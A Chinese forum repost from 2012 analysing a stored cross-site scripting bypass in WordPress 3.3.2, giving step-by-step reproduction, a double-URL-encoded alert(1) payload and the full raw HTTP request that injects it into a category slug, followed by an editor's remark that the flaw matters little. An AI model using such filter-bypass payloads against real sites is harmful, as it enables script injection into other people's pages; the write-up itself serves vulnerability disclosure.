好傢伙 發表於 2012-6-7 08:41:36

WordPress 3.3.2鸡肋存储型跨站漏洞的分析

WordPress最新版本3.3.2存在一个双字节编码的存储型跨站漏洞,可以bypass内置的filter机制,但是利用起来有点鸡肋,细节如下: <br /><strong>1:登录管理账户 <br />2:单击分类 <br />3:填写跨站参数,并用burp suite拦截请求 <br />4:输入<font color="#ff0000">%253cscript%253ealert%25281%2529%253c%252fscript%253e</font>可以直接bypass</strong>。<br />BURP请求数据包: <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode3"> <br />POST /wordpress/wp-admin/edit-tags.php HTTP/1.1 <br />Host: localhost <br />User-Agent: Mozilla/5.0 (X11; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0 <br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 <br />Accept-Language: en-us,en;q=0.5 <br />Accept-Encoding: gzip, deflate <br />Proxy-Connection: keep-alive <br />Referer: <br />https://www.jb51.net /wordpress/wp-admin/edit-tags.php?action=edit&amp;taxonomy=link_category&amp;tag_ID=2&amp;post_type=post <br />Cookie: <br />wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C197b22093eaefaf6950bd81d6aa6372b; <br />wp-settings-time-1=1335371272; wordpress_test_cookie=WP+Cookie+check; <br />wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C6ebcb9d0104a37c6d7a91274ac94c6cb <br />Content-Type: application/x-www-form-urlencoded <br />Content-Length: 379 <br />action=editedtag&amp;tag_ID=2&amp;taxonomy=link_category&amp;_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Dlink_category&amp;_wpnonce=83974d7f8f&amp;_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Faction%3Dedit%26taxonomy%3Dlink_category%26tag_ID%3D2%26post_type%3Dpost&amp;name=Blogroll&amp;slug=injecthere%253cscript%253ealert%25281%2529%253c%252fscript%253e&amp;description=sectest&amp;submit=Update <br /></div><br />小编:鸡肋,鸡肋中的鸡肋,minminmsn同学应该是翻译自国外的文章,没有经过详细的测试,wordpress默认的filter机制对管理员权限是不过滤的,所以不仅仅在分类里存在跨站,其他地方更是跨站多多。也许有其他的猥琐的用途吧。 <br />作者:freebuf <br />
頁: [1]
查看完整版本: WordPress 3.3.2鸡肋存储型跨站漏洞的分析